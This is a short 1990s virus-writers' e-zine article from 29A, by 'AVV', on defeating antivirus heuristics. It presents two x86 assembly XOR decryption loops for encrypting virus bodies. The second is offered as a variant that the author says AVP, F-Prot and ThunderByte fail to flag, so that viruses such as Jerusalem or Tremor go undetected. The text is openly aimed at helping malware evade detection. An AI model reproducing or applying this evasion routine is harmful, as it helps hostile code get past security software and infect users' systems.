Copy Link
Add to Bookmark
Report
29A Issue 01 03 02
Antiheuristics
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ>
AVV
We're used to the newest antivirus promising a total protection against
unknown viruses, with what they call heuristics. And though being an im-
portant weapon against viruses, it isn't that safe they assure. We won't
explain what heuristics are (it is just looking for several instructions
common to all viruses, which will show their presence). Nevertheless, if
we hide these instructions, the antivirus won't detect anything and will
happily say there's no danger, when checking a modified version of Neuro-
quila, Tremor, Zhengxi, etc., which will be encrypted for these AVs.
Technique is easy. We just have to use a simple encryption routine with
which the antivirus will note nothing. AVP, F-Prot and ThunderByte recog-
nize several encryption routines. Now, the following routine decrypts a
previously encrypted code:
lea di,enc_start ; ds:di -> first encrypted byte
mov cx,enc_size ; cx has code's length
loop1: mov al,byte ptr es:[di]
xor al,0cfh ; we'll simply xor each byte
stosb ; and store it back
loop loop1
This routine is easy to get caught by an antivirus, and will discover the
hidden virus. But let's change slightly the routine:
lea di,enc_start
mov si,di
mov cx,enc_size
mov dh,0cfh
loop1: xor byte ptr es:[di],dh
movsb
loop loop1
This routine does exactly the same, but isn't caught by the heuristic
scan of any antivirus, so no crappy AV will decrypt anything, and our vi-
rus won't be detected... :) If the programmer is careful of not using any
garbage code, all the AVs will fail to detect any virus, no matter how
famous it is... even Jerusalem! :) This demonstrates that heuristics are
not as safe as they appear to be.
Greets,
AVV.